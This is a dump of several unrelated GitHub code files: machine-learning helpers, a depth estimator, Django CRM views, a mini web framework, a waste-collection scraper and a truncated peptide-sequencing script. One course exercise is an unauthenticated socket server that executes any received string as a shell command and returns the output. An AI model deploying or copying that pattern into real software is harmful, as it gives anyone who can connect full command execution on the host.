]\n)\n","repo_name":"agoragames/amico-python","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"30696814770","text":"import numpy as np\n\n\ndef compute_cost(X, y, theta):\n m = X.shape[0]\n X_ones = np.c_[np.ones((m, 1)), X]\n h_x = X_ones * theta\n difference = np.power(h_x - y, 2)\n sum_ = np.sum(difference)\n cost = 1 / (2 * m) * sum_\n return cost\n\n\ndef gradient_descent(X, y, alpha, iterations):\n m = X.shape[0]\n X_ones = np.c_[np.ones((m, 1)), X]\n n = X_ones.shape[1]\n theta = np.matrix(np.ones(n)).T\n theta[0] = 0\n J_theta = np.matrix(np.zeros(iterations)).T\n\n temp_theta = theta\n for i in range(iterations):\n h_x = X_ones * temp_theta\n difference = np.power(h_x - y, 2)\n sum_ = np.sum(difference)\n J_theta[i] = 1 / (2 * m) * sum_\n temp_theta = temp_theta - alpha * 1 / m * np.dot(X_ones.T, (h_x - y))\n\n return J_theta, temp_theta\n","repo_name":"giezz/Artificial-Intelligence-Methods","sub_path":"labs/lab3/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6376637745","text":"# -*- coding:utf-8 -*-\n__author__ = 'Qiushi Huang'\n\nimport socket\nimport subprocess\n\n\"\"\"\n需要服务端一直提供服务,\n\"\"\"\nphone = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n# phone.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1) # 启动关闭服务端时,系统端口没有回收,可以重用端口\nphone.bind(('127.0.0.1', 8080))\nphone.listen(5) # 最大挂起的链接数\n\nprint('starting...')\n\nwhile True: # 链接循环\n conn, client_addr = phone.accept()\n print(client_addr)\n\n while True: # 通信循环\n try:\n # 1、收命令\n cmd = conn.recv(1024)\n if not cmd:break # 适用于linux\n\n # 2、执行命令,拿到结果\n obj = subprocess.Popen(cmd.decode('utf-8'), shell=True, # 命令传过来的是bytes格式,按照客户端编码解码\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n stdout = obj.stdout.read() # 服务器系统运行结果,Linux 是utf-8\n stderr = obj.stderr.read()\n\n # 3、把命令的结果返回给客户端\n conn.send(stdout+stderr) # 无论对错信息都返回,'+'会生成新的内存空间,效率低\n \"\"\"+是未来需要优化的点\"\"\"\n except ConnectionResetError: # 使用于windows\n break\n\n conn.close()\n\nphone.close()\n\n","repo_name":"hqs2212586/startMyPython3.0","sub_path":"第六章-网络编程/5 简单套接字加上循环/5.4 
模拟ssh远程执行命令/服务端.py","file_name":"服务端.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41091846487","text":"from __future__ import annotations\n\nimport cv2\nimport numpy as np\n\nfrom operator import itemgetter\nfrom typing import List, Optional, Tuple\n\nfrom smg.rigging.helpers import CameraUtil\nfrom smg.utility import DepthImageProcessor, ImageUtil, MonocularDepthEstimator\n\nfrom .mvdepth_multiview_depth_estimator import MVDepthMultiviewDepthEstimator\n\n\nclass MVDepth2MonocularDepthEstimator(MonocularDepthEstimator):\n \"\"\"A monocular depth estimator based on MVDepthNet that triangulates against two different keyframes.\"\"\"\n\n # CONSTRUCTOR\n\n def __init__(self, *, border_to_fill: int = 40, debug: bool = False,\n max_consistent_depth_diff: float = 0.05, max_depth: float = 3.0,\n max_rotation_before_keyframe: float = 5.0, max_rotation_for_triangulation: float = 20.0,\n max_translation_before_keyframe: float = 0.05, min_translation_for_triangulation: float = 0.025):\n \"\"\"\n Construct a monocular depth estimator based on MVDepthNet that triangulates against two different keyframes.\n\n :param border_to_fill: The size of the border (in pixels) of the estimated depth image\n that is to be filled with zeros to help mitigate depth noise.\n :param debug: Whether to show debug visualisations.\n :param max_consistent_depth_diff: The maximum difference there can be between the depths estimated\n for a pixel by the best and second best keyframes for those depths\n to be considered sufficiently consistent.\n :param max_depth: The maximum depth values to keep during post-processing (pixels with\n depth values greater than this will have their depths set to zero).\n :param max_rotation_before_keyframe: The maximum rotation (in degrees) there can be between the current\n look vector and the look vector of the closest keyframe without\n triggering the creation of a new keyframe.\n :param max_rotation_for_triangulation: The maximum rotation (in degrees) there can be between the look\n vector of a keyframe and the current look vector for the keyframe\n to be used.\n :param max_translation_before_keyframe: The maximum translation (in m) there can be between the current\n position and the position of the closest keyframe without\n triggering the creation of a new keyframe.\n :param min_translation_for_triangulation: The minimum translation (in m) there can be between the position\n of a keyframe and the current position for the keyframe to be used.\n \"\"\"\n self.__border_to_fill: int = border_to_fill\n self.__debug: bool = debug\n self.__keyframes: List[Tuple[np.ndarray, np.ndarray]] = []\n self.__max_consistent_depth_diff: float = max_consistent_depth_diff\n self.__max_depth: float = max_depth\n self.__max_rotation_before_keyframe: float = max_rotation_before_keyframe\n self.__max_rotation_for_triangulation: float = max_rotation_for_triangulation\n self.__max_translation_before_keyframe: float = max_translation_before_keyframe\n self.__min_translation_for_triangulation: float = min_translation_for_triangulation\n self.__multiview_depth_estimator: MVDepthMultiviewDepthEstimator = MVDepthMultiviewDepthEstimator()\n\n # PUBLIC METHODS\n\n def estimate_depth(self, colour_image: np.ndarray, tracker_w_t_c: np.ndarray, *, postprocess: bool = False) \\\n -> Optional[np.ndarray]:\n \"\"\"\n Try to estimate a depth image corresponding to the colour image passed in.\n\n .. 
note::\n If two suitable keyframes cannot be found for triangulation, this will return None.\n\n :param colour_image: The colour image.\n :param tracker_w_t_c: The camera pose corresponding to the colour image (as a camera -> world transform).\n :param postprocess: Whether or not to apply any optional post-processing to the depth image.\n :return: The estimated depth image, if possible, or None otherwise.\n \"\"\"\n result: Optional[Tuple[np.ndarray, np.ndarray]] = self.estimate_depth_full(colour_image, tracker_w_t_c)\n if result is not None:\n estimated_depth_image, depth_diff_image = result\n\n # Filter out any depths that were not sufficiently consistent across both depth estimates.\n estimated_depth_image = np.where(\n depth_diff_image < self.__max_consistent_depth_diff, estimated_depth_image, 0.0\n )\n\n # If we're debugging, show the raw estimated depth image.\n if self.__debug:\n cv2.imshow(\"Raw Estimated Depth Image\", estimated_depth_image / 5)\n cv2.waitKey(1)\n\n # Return the estimated depth image, fully post-processing it in the process if requested,\n # or just limiting the maximum depth as requested otherwise.\n if postprocess:\n return DepthImageProcessor.postprocess_depth_image(\n estimated_depth_image, max_depth=self.__max_depth, max_depth_difference=0.05,\n median_filter_radius=7, min_region_size=20000, min_valid_fraction=0.2\n )\n else:\n return np.where(estimated_depth_image <= self.__max_depth, estimated_depth_image, 0.0)\n else:\n return None\n\n def estimate_depth_full(self, colour_image: np.ndarray, tracker_w_t_c: np.ndarray) \\\n -> Optional[Tuple[np.ndarray, np.ndarray]]:\n \"\"\"\n Try to estimate a depth image corresponding to the colour image passed in.\n\n .. note::\n If two suitable keyframes cannot be found for triangulation, this will return None.\n\n :param colour_image: The colour image.\n :param tracker_w_t_c: The camera pose corresponding to the colour image (as a camera -> world transform).\n :return: If possible, a tuple consisting of the estimated depth image and a depth difference\n image in which each pixel denotes the absolute difference between estimates of the\n depth based on two different keyframes, or None otherwise.\n \"\"\"\n best_depth_image: Optional[np.ndarray] = None\n second_best_depth_image: Optional[np.ndarray] = None\n\n # Compute the translations (in m) and (look) rotations (in degrees) with respect to any existing keyframes.\n translations: List[float] = []\n rotations: List[float] = []\n for _, keyframe_w_t_c in self.__keyframes:\n translations.append(CameraUtil.compute_translation_p(tracker_w_t_c, keyframe_w_t_c))\n rotations.append(CameraUtil.compute_look_rotation_p(tracker_w_t_c, keyframe_w_t_c))\n\n # Score all of the keyframes with respect to the current frame.\n scores: List[(int, float)] = []\n translation_to_closest_keyframe: float = np.inf\n rotation_to_closest_keyframe: float = np.inf\n\n for i in range(len(self.__keyframes)):\n if translations[i] < translation_to_closest_keyframe:\n translation_to_closest_keyframe = translations[i]\n rotation_to_closest_keyframe = rotations[i]\n\n if translations[i] < self.__min_translation_for_triangulation \\\n or rotations[i] > self.__max_rotation_for_triangulation:\n # If the translation's too small, or the rotation's too large, force the score of this keyframe to 0.\n scores.append((i, 0.0))\n else:\n # Otherwise, compute a score loosely based on the one in the Mobile3DRecon paper. 
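The translation weight w_b below is a Gaussian bump that peaks when the baseline to the keyframe equals b_m metres. 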
Note that we don't\n # use the rotation part of the score, as it produces bad results, and we change the parameters for\n # the translation part of the score (as these parameters empirically seem to work better).\n b_m: float = 0.4\n delta: float = 0.2\n w_b: float = np.exp(-(translations[i] - b_m) ** 2 / delta ** 2)\n scores.append((i, w_b))\n\n # Try to choose up to two keyframes to use together with the current frame to estimate the depth.\n if len(scores) >= 2:\n # Find the two best keyframes, based on their scores.\n # FIXME: There's no need to fully sort the list here.\n # See: https://stackoverflow.com/a/23734295/499449\n # x[np.argpartition(x, range(-2,0))[::-1]\n scores = sorted(scores, key=itemgetter(1), reverse=True)\n best_keyframe_idx, best_keyframe_score = scores[0]\n second_best_keyframe_idx, second_best_keyframe_score = scores[1]\n\n # If both keyframes are fine to use:\n if best_keyframe_score > 0.0 and second_best_keyframe_score > 0.0:\n # Look up the keyframe images and poses.\n best_keyframe_image, best_keyframe_w_t_c = self.__keyframes[best_keyframe_idx]\n second_best_keyframe_image, second_best_keyframe_w_t_c = self.__keyframes[second_best_keyframe_idx]\n\n # Separately estimate a depth image from each keyframe.\n best_depth_image = self.__multiview_depth_estimator.estimate_depth(\n colour_image, best_keyframe_image, tracker_w_t_c, best_keyframe_w_t_c\n )\n second_best_depth_image = self.__multiview_depth_estimator.estimate_depth(\n colour_image, second_best_keyframe_image, tracker_w_t_c, second_best_keyframe_w_t_c\n )\n\n # If we're debugging, show both depth images.\n if self.__debug:\n cv2.imshow(\"Best Depth Image\", best_depth_image / 5)\n cv2.imshow(\"Second Best Depth Image\", second_best_depth_image / 5)\n cv2.waitKey(1)\n\n # Check whether this frame should be a new keyframe. 
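A new keyframe is warranted once the camera has translated or rotated past the keyframing thresholds. 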
If so, add it to the list.\n if translation_to_closest_keyframe > self.__max_translation_before_keyframe \\\n or rotation_to_closest_keyframe > self.__max_rotation_before_keyframe:\n self.__keyframes.append((colour_image.copy(), tracker_w_t_c.copy()))\n\n # If best and second-best depth images were successfully estimated:\n if best_depth_image is not None:\n # Calculate the average of the two depth images.\n estimated_depth_image: np.ndarray = (best_depth_image + second_best_depth_image) / 2\n\n # Fill the border with zeros (depths around the image border are often quite noisy).\n estimated_depth_image = ImageUtil.fill_border(estimated_depth_image, self.__border_to_fill, 0.0)\n\n # Calculate how inconsistent the depth estimates are for each pixel.\n depth_diff_image: np.ndarray = np.abs(best_depth_image - second_best_depth_image)\n\n # If we're debugging, show the output images.\n if self.__debug:\n cv2.imshow(\"Raw Estimated Depth Image\", estimated_depth_image / 5)\n cv2.imshow(\"Depth Inconsistency Image\", depth_diff_image)\n cv2.waitKey(1)\n\n return estimated_depth_image, depth_diff_image\n else:\n return None\n\n def get_keyframes(self) -> List[Tuple[np.ndarray, np.ndarray]]:\n \"\"\"\n Get the current set of keyframes.\n\n :return: The current set of keyframes.\n \"\"\"\n return self.__keyframes\n\n def set_intrinsics(self, intrinsics: np.ndarray) -> MVDepth2MonocularDepthEstimator:\n \"\"\"\n Set the camera intrinsics.\n\n :param intrinsics: The 3x3 camera intrinsics matrix.\n :return: The current object.\n \"\"\"\n self.__multiview_depth_estimator.set_intrinsics(intrinsics)\n return self\n","repo_name":"sgolodetz/smg-mvdepthnet","sub_path":"smg/mvdepthnet/mvdepth2_monocular_depth_estimator.py","file_name":"mvdepth2_monocular_depth_estimator.py","file_ext":"py","file_size_in_byte":12366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6760438945","text":"from django.shortcuts import render\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom django.contrib.auth.decorators import login_required\nfrom next_crm.models import ContactFields,ContactTab,DefaultDataFields\nimport json\nfrom django.conf import settings\n\n# Create your views here.\n@login_required(login_url=\"/login/\")\ndef setting(request):\n user_id = request.user.id\n company_id = request.user.profile.company_id\n if request.is_ajax():\n json_response = {'success': False, 'msg':''}\n lst = []\n if 'post_data' in request.POST:\n data = request.POST['post_data']\n dic_data = json.loads(data)\n print(\"dic_data\", dic_data)\n for d in dic_data:\n if d == 'deleted-tabs':\n delete_tab_list = dic_data['deleted-tabs']\n if len(delete_tab_list) > 0:\n for d2 in delete_tab_list:\n delete_tab(d2)\n else:\n tab_field_list = []\n is_default_tab = True if dic_data[d]['is_default'] == 'true' else False\n tab_data_dic = {'id': dic_data[d]['id'],\n 'module_id': 1,\n 'name': dic_data[d]['label'],\n 'fields': tab_field_list,\n 'display_weight': dic_data[d]['position'],\n 'is_default': is_default_tab,\n 'user_id': user_id,\n 'company_id':company_id\n }\n print(\"dd-->\", tab_data_dic)\n if 'tabFields' in dic_data[d]:\n tab_field_list = save_contact_field_data(dic_data[d]['tabFields'],user_id,company_id)\n if 'unused_fields' in dic_data[d]:\n for un in dic_data[d]['unused_fields']:\n if int(un) > 0 and int(un)!=int(501):\n make_default_field_unused(un)\n tab_field_list.append(un)\n if len(tab_field_list) > 0:\n tab_data_dic['fields'] = tab_field_list\n 
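# persist the assembled tab definition together with its field ids\n                    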
save_contact_tab_data(tab_data_dic)\n json_response['success'] =True\n json_response['msg'] = 'All settings have been saved.'\n\n return HttpResponse(json.dumps(json_response), content_type='application/json')\n\n else:\n data_list =[]\n contact_tabs = ContactTab.objects.all().filter(user_id=request.user.id,company_id=company_id).order_by('display_weight')\n if contact_tabs is not None:\n for o in contact_tabs:\n default_data_fields = ContactFields.objects.all().filter(id__in=o.fields).order_by('display_weight')\n if default_data_fields is not None:\n data_list.append({'name': o.name,\n 'id':o.id,\n 'display_weight':o.display_weight,\n 'is_default': o.is_default,\n 'fields': default_data_fields\n })\n print(default_data_fields)\n else:\n default_data_fields ={}\n labels = {\n 'button_new_field':settings.LABELS['en']['button_new_field'],\n 'text_unused_fields':settings.LABELS['en']['text_unused_fields'],\n 'text_single_line': settings.LABELS['en']['text_single_line'],\n 'text_checkbox': settings.LABELS['en']['text_checkbox'],\n 'text_radio': settings.LABELS['en']['text_radio'],\n 'text_phone': settings.LABELS['en']['text_phone'],\n 'text_multiline': settings.LABELS['en']['text_multiline'],\n 'text_date': settings.LABELS['en']['text_date'],\n 'text_drop_down': settings.LABELS['en']['text_drop_down'],\n 'text_settings': settings.LABELS['en']['text_settings'],\n 'text_contact': settings.LABELS['en']['text_contact'],\n 'text_add_new_tab': settings.LABELS['en']['text_add_new_tab'],\n 'text_save_all': settings.LABELS['en']['text_save_all'],\n 'text_select_option': settings.LABELS['en']['text_select_option'],\n 'text_set_properties': settings.LABELS['en']['text_set_properties'],\n 'text_rename': settings.LABELS['en']['text_rename'],\n 'text_delete': settings.LABELS['en']['text_delete'],\n 'text_drag_info': settings.LABELS['en']['text_drag_info'],\n\n }\n return render(request, 'web/settings/contact_setting.html', {'default_data_fields': data_list,'labels':labels})\n\n\ndef contact_setting_save(request):\n if request.is_ajax():\n json_response = {'success': 'true'}\n return HttpResponse(json.dumps(json_response),content_type='application/json')\n\ndef save_contact_field_data(fields, user_id, company_id):\n counter = 0\n field_lst = []\n for i in fields:\n counter += 1\n options = []\n if i['type'] == 'drop-down' or i['type'] == 'checkbox' or i['type'] == 'radio':\n options = i['options']\n\n if 'id' in i and i['id'] != '0' and i['id'] != 'new':\n object_id = i['id']\n try:\n contact_field = ContactFields.objects.get(pk=object_id)\n contact_field.name = i['label'].replace(\" \", \"-\").lower()\n contact_field.type = i['type']\n contact_field.label = i['label']\n contact_field.is_default = True if i['default'] == 'true' else False\n contact_field.is_required = True if i['is_required'] == 'true' else False\n contact_field.display_weight = counter\n contact_field.display_position = i['direction']\n contact_field.is_unused = False\n\n contact_field.default_values = options\n contact_field.user_id = user_id\n contact_field.company_id = company_id\n contact_field.save()\n #save_default_value(default_data)\n field_lst.append(contact_field.id)\n except ContactFields.DoesNotExist:\n contact_field = ContactFields()\n contact_field.name = i['label'].replace(\" \", \"-\").lower()\n contact_field.type = i['type']\n contact_field.label = i['label']\n contact_field.is_default = True if i['default'] == 'true' else False\n contact_field.is_required = True if i['is_required'] == 'true' else False\n 
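# counter encodes the submitted field order, so display_weight preserves the on-screen layout\n                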
contact_field.display_weight = counter\n contact_field.display_position = i['direction']\n contact_field.is_unused = False\n contact_field.default_values = options\n contact_field.user_id = user_id\n contact_field.company_id = company_id\n contact_field.save()\n field_lst.append(contact_field.id)\n elif i['id'] == 'new':\n contact_field = ContactFields()\n contact_field.name = i['label'].replace(\" \", \"-\").lower()\n contact_field.type = i['type']\n contact_field.label = i['label']\n contact_field.is_default = True if i['default'] == 'true' else False\n contact_field.is_required = True if i['is_required'] == 'true' else False\n contact_field.display_weight = counter\n contact_field.display_position = i['direction']\n contact_field.is_unused = False\n contact_field.default_values = options\n contact_field.user_id = user_id\n contact_field.company_id = company_id\n contact_field.save()\n #save_default_value(default_data)\n field_lst.append(contact_field.id)\n return field_lst\n\n\ndef save_contact_tab_data(tab_data):\n if tab_data['id'] != 'new':\n try:\n contact_tab = ContactTab.objects.get(pk=tab_data['id'])\n contact_tab.module_id = tab_data['module_id']\n contact_tab.name = tab_data['name']\n contact_tab.fields = tab_data['fields']\n contact_tab.display_weight = tab_data['display_weight']\n contact_tab.is_default = tab_data['is_default']\n contact_tab.user_id = tab_data['user_id']\n contact_tab.company_id = tab_data['company_id']\n contact_tab.save()\n except ContactTab.DoesNotExist:\n contact_tab = ContactTab()\n contact_tab.module_id = tab_data['module_id']\n contact_tab.name = tab_data['name']\n contact_tab.fields = tab_data['fields']\n contact_tab.display_weight = tab_data['display_weight']\n contact_tab.is_default = tab_data['is_default']\n contact_tab.user_id = tab_data['user_id']\n contact_tab.company_id = tab_data['company_id']\n contact_tab.save()\n elif tab_data['id']=='new':\n tab_data['is_default']=False\n contact_tab = ContactTab()\n contact_tab.module_id = tab_data['module_id']\n contact_tab.name = tab_data['name']\n contact_tab.fields = tab_data['fields']\n contact_tab.display_weight = tab_data['display_weight']\n contact_tab.is_default = tab_data['is_default']\n contact_tab.user_id = tab_data['user_id']\n contact_tab.company_id = tab_data['company_id']\n contact_tab.save()\n return True\n\n\n\n\ndef delete_tab(tab_id):\n t = ContactTab.objects.get(pk=tab_id)\n if t is not None:\n fields = t.fields\n for i in fields:\n delete_fields(i)\n t.delete()\n\ndef delete_fields(field_id):\n d = ContactFields.objects.get(pk=field_id)\n if d is not None:\n d.delete()\n\ndef make_default_field_unused(field_id):\n contact_field = ContactFields.objects.get(pk=field_id)\n if contact_field is not None:\n contact_field.is_unused = True\n contact_field.save()\n\ndef save_default_value(data):\n print ('test',data)\n","repo_name":"ambre1pravin/django-react","sub_path":"next_crm/views/Settings.py","file_name":"Settings.py","file_ext":"py","file_size_in_byte":10420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14838363615","text":"import re\r\n\r\nfrom frame.ToolBox.ConnectFile import read_config_of_db\r\n\r\n# 连接数据库\r\n_db = read_config_of_db()\r\n\r\n# 配置路由\r\nURL_CONTENT_DICT = dict()\r\n\r\n\r\ndef route(string):\r\n '''\r\n 创建路由功能\r\n :param string: 页面地址\r\n :return: None\r\n '''\r\n def call_func(function):\r\n URL_CONTENT_DICT[string] = function\r\n return call_func\r\n\r\n\r\n@route('/login.html')\r\ndef login():\r\n 
login():\r\n    
with open(\"templates/login.html\", encoding='utf-8') as f:\r\n data = f.read()\r\n return data\r\n\r\n\r\n@route('/index.html')\r\ndef index():\r\n with open(\"templates/index.html\", encoding='utf-8') as f:\r\n data = f.read()\r\n\r\n word_content = tuple(_db.select(\"select * from word_table\"))\r\n\r\n html = \"\"\"\"\"\"\r\n for word_info in word_content:\r\n html_templates = \"\"\"\r\n <tr>\r\n <th>{}</th>\r\n <th>{}</th>\r\n \r\n </tr>\r\n <tr>\r\n <th colspan=\"2\">{}</th>\r\n </tr>\r\n \"\"\".format(word_info[1], word_info[2], None)\r\n\r\n html += html_templates\r\n\r\n data = re.sub(r\"\\{%content%\\}\", str(html), data)\r\n return data\r\n\r\n\r\ndef application(env, set_header):\r\n set_header('200 OK', [(\"Content-Type\", \"text/html;charset=utf-8\")])\r\n file_name = env['PATH_INFO']\r\n try:\r\n return URL_CONTENT_DICT[file_name]()\r\n except Exception as e:\r\n return \"content error:{}\".format(e.args)","repo_name":"Bean-jun/englishword","sub_path":"old_dev/frame/mini_frame.py","file_name":"mini_frame.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24651435195","text":"import os, os.path\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\nimport numpy as np\nimport cv2\nimport collections\nimport re\nimport sys\nfrom random import shuffle\nfrom random import randint\nfrom numpy import array\nimport random\nexec(open(\"./File_Paths.py\").read())\n\n############################################################################\nrandom.seed(1234)\npositive_label = re.compile(r'^car')\n\n#Do NOT change these\nimage_size = 224\nnum_classes = 2\n\n# Intialize lists and variables\nfile_paths_train = []\nfile_paths_test = []\n\ndef crop_center(img,cropx,cropy,shift):\n y,x,c = img.shape\n x_shift = randint(-shift,shift)\n y_shift = randint(-shift,shift)\n\n startx = x//2 - cropx//2 + x_shift\n starty = y//2 - cropy//2 + y_shift \n return img[starty:starty+cropy, startx:startx+cropx, :]\n\ndef preprocess_input(x):\n x = np.true_divide(x, 255)\n # x /= 255.\n x -= 0.5\n x *= 2.\n return x\n\nfor dir in dirs:\n path_train = dir + 'train/'\n path_test = dir + 'test/'\n\n for root, di, files in os.walk(path_train):\n file_names = [os.path.join(path_train, f) for f in os.listdir(path_train) if os.path.isfile(os.path.join(path_train, f))]\n file_paths_train.extend(file_names)\n\n for root, di, files in os.walk(path_test):\n file_names = [os.path.join(path_test, f) for f in os.listdir(path_test) if os.path.isfile(os.path.join(path_test, f))]\n file_paths_test.extend(file_names)\n\n#Shuffle to randomize training\nshuffle(file_paths_train)\nshuffle(file_paths_test)\n\nfile_paths_train = array(file_paths_train)\nfile_paths_test = array(file_paths_test)\nprint(\"No. of training images: \", len(file_paths_train))\nprint(\"No. 
of testing images: \", len(file_paths_test))\n\n\n#Read all the training images and labels\nX_train = []\nlabels_train = []\n\nfor aFile in file_paths_train:\n #Image decoding\n input_value = cv2.imread(aFile)\n input_value = preprocess_input(input_value)\n #Get a 224x224 from 256x256 image which is cropped randomly around center\n input_value_crop = np.zeros((image_size, image_size, 3), dtype=np.float32)\n input_value_crop = crop_center(input_value,image_size,image_size, 12)\n\n X_train.append(input_value_crop)\n #Label decoding\n #'1' for car, '0' for not car\n aFileName = os.path.basename(aFile)\n mo = positive_label.search(aFileName)\n if mo:\n labels_train.append(1)\n else:\n labels_train.append(0)\n\n#Converting labels into one hot array\nY_train = np.zeros((len(labels_train), num_classes))\nY_train[np.arange(len(labels_train)),labels_train] = 1\n\nX_train = array(X_train)\n# print(\"labels_id: \",labels_train)\n# print(\"Y_train: \",Y_train)\n# print(\"file_paths: \",file_paths_train)\n\n#Read all the testing images and labels\nX_test = []\nlabels_test = []\n\nfor aFile in file_paths_test:\n #Image decoding\n input_value = cv2.imread(aFile)\n input_value = preprocess_input(input_value)\n #Get a 224x224 from 256x256 image which is center cropped\n input_value_crop = np.zeros((image_size, image_size, 3), dtype=np.float32)\n input_value_crop = crop_center(input_value,image_size,image_size, 0)\n\n X_test.append(input_value_crop)\n #Label decoding\n #'1' for car, '0' for not car\n aFileName = os.path.basename(aFile)\n mo = positive_label.search(aFileName)\n if mo:\n labels_test.append(1)\n else:\n labels_test.append(0)\n\n#Converting labels into one hot array\nY_test = np.zeros((len(labels_test), num_classes))\nY_test[np.arange(len(labels_test)),labels_test] = 1\n\nX_test = array(X_test)\n# print(\"labels_id: \",labels_test)\n# print(\"Y_test: \",Y_test)\n# print(\"file_paths: \",file_paths_test)\n\nprint(\"DATA IMPORT: All the train and test data loaded in X_train, Y_train, X_test, Y_test\")","repo_name":"gnavihs/EyeInTheSky","sub_path":"DataImport.py","file_name":"DataImport.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74146136748","text":"import requests\nfrom waste_collection_schedule import Collection\nfrom waste_collection_schedule.service.ICS import ICS\n\nTITLE = \"Kreiswirtschaftsbetriebe Goslar\"\nDESCRIPTION = \"Source for kwb-goslar.de waste collection.\"\nURL = \"https://www.kwb-goslar.de\"\nTEST_CASES = {\n \"Berliner Straße (Clausthal-Zellerfeld)\": {\"pois\": \"2523.602\"},\n \"Braunschweiger Straße (Seesen)\": {\"pois\": \"2523.409\"},\n}\n\nICON_MAP = {\n \"Baum- und Strauchschnitt\": \"mdi:leaf\",\n \"Biotonne\": \"mdi:bio\",\n \"Blaue Tonne\": \"mdi:newspaper-variant-multiple\",\n \"Gelber Sack\": \"mdi:recycle\",\n \"Restmülltonne\": \"mdi:trash-can\",\n \"Weihnachtsbäume\": \"mdi:pine-tree\",\n}\n\n\nclass Source:\n def __init__(self, pois):\n self.ics = ICS()\n self.pois = pois\n\n def fetch(self):\n r = requests.get(\n url=\"https://www.kwb-goslar.de/output/options.php\",\n params={\n \"ModID\": \"48\",\n \"call\": \"ical\",\n \"pois\": self.pois,\n },\n headers={\n \"Referer\": \"https://www.kwb-goslar.de\",\n },\n )\n\n if not r.ok:\n raise Exception(f\"Error: failed to fetch url: {r.request.url}\")\n\n dates = self.ics.convert(r.text)\n\n entries = []\n for d in dates:\n date, waste_type = d\n icon = ICON_MAP.get(waste_type)\n 
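# icon stays None for waste types missing from ICON_MAP\n            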
entries.append(Collection(date=date, t=waste_type, icon=icon))\n\n return entries\n","repo_name":"mampfes/hacs_waste_collection_schedule","sub_path":"custom_components/waste_collection_schedule/waste_collection_schedule/source/kwb_goslar_de.py","file_name":"kwb_goslar_de.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":559,"dataset":"github-code","pt":"37"} +{"seq_id":"71853194666","text":"'''\nCode Challenge: Implement LeaderboardCyclopeptideSequencing.\n Input: An integer N and a collection of integers Spectrum.\n Output: LeaderPeptide after running LeaderboardCyclopeptideSequencing(Spectrum, N).\n-------------------------------------------------\nSample Input:\n10\n0 71 113 129 147 200 218 260 313 331 347 389 460\n-------------------------------------------------\nSample Output:\n113-147-71-129\n\n'''\nmaxn = 6000\nAminoAcids = [[57], [71], [87], [97], [99], [101], [103], [113], [114], [115], [128], [129], [131], [137], [147], [156], [163], [186]]\n\ndef getMass(Peptide):\n\treturn sum(Peptide)\n\t\ndef cyclospectrum(Peptide):\n\tspectrum = []\n\tfor k in range(1,len(Peptide)):\n\t\tfor i in range(len(Peptide)):\n\t\t\telement = Peptide[i:i+k]\n\t\t\tif k-len(Peptide)+i>0:\n\t\t\t\telement += Peptide[:k-len(Peptide)+i]\n\t\t\tspectrum.append(sum(element))\n\tspectrum += [0,sum(Peptide)]\n\tspectrum.sort()\n\treturn spectrum\n\ndef linearSpectrum(Peptide):\n\toutput = []\n\tfor k in range(1,len(Peptide)):\n\t\tfor i in range(len(Peptide)):\n\t\t\telement = Peptide[i:i+k]\n\t\t\toutput.append(sum(element))\n\toutput += [0,sum(Peptide)]\n\treturn output\n\ndef cycScore(Peptide,Spectrum):\n\tTheorSpectrum = cyclospectrum(Peptide)\n\tbucketThSptm = [0]*maxn\n\tfor item in TheorSpectrum:\n\t\tbucketThSptm[item] += 1\n\tbucketSptm = [0]*maxn\n\tfor item in Spectrum:\n\t\tbucketSptm[item] += 1\n\tscore = 0\n\tfor i in range(maxn):\n\t\tif bucketSptm[i]<bucketThSptm[i]:\n\t\t\tscore += bucketSptm[i]\n\t\telse:\n\t\t\tscore += bucketThSptm[i]\n\treturn score\n\ndef linearScore(Peptide,Spectrum):\n\tTheorSpectrum = linearSpectrum(Peptide)\n\tbucketThSptm = [0]*maxn\n\tfor item in TheorSpectrum:\n\t\tbucketThSptm[item] += 1\n\tbucketSptm = [0]*maxn\n\tfor item in Spectrum:\n\t\tbucketSptm[item] += 1\n\tscore = 0\n\tfor i in range(maxn):\n\t\tif bucketSptm[i]<bucketThSptm[i]:\n\t\t\tscore += bucketSptm[i]\n\t\telse:\n\t\t\tscore += bucketThSptm[i]\n\treturn score\n\ndef Trim(Leaderboard,Spectrum,N):\n\tLBwithSocre = []\n\tfor item in Leaderboard:\n\t\tLBwithSocre.append([item,linearScore(item, Spectrum)])\n\tLBwithSocre = sorted(LBwithSocre,key=lambda x:x[1],reverse=True)\n\toutput = []\n\tif N < len(LBwithSocre):\n\t\tscoreLast = LBwithSocre[N-1][1]\n\t\ti = 0\n\t\twhile(LBwithSocre[i][1]>=scoreLast):\n\t\t\toutput.append(LBwithSocre[i][0])\n\t\t\ti+=1\n\t\t\t'''\n\t\t\tif i>=len(LBwithSocre):\n\t\t\t\tbreak\n\t\t\t'''\n\telse:\n\t\toutput = [i[0] for i in LBwithSocre]\n\t\t\t\t\t\n\treturn output\n\t\ndef Expand(Leaderboard):\n\tif Leaderboard == []:\n\t\treturn [i for i in AminoAcids]\n\toutput = []\n\tfor aa in AminoAcids:\n\t\tfor item in Leaderboard:\n\t\t\toutput.append(item+aa)\n\treturn output\n\n\nfrom os.path import dirname\nmassTable = open(dirname(__file__) + 'integer_mass_table.txt').read().strip().split('\\n')\nfor i in range(len(massTable)):\n\tmassTable[i] = massTable[i].split()\n\tmassTable[i][1] = int(massTable[i][1])\nmassTable = dict(massTable)\n\ndataset = 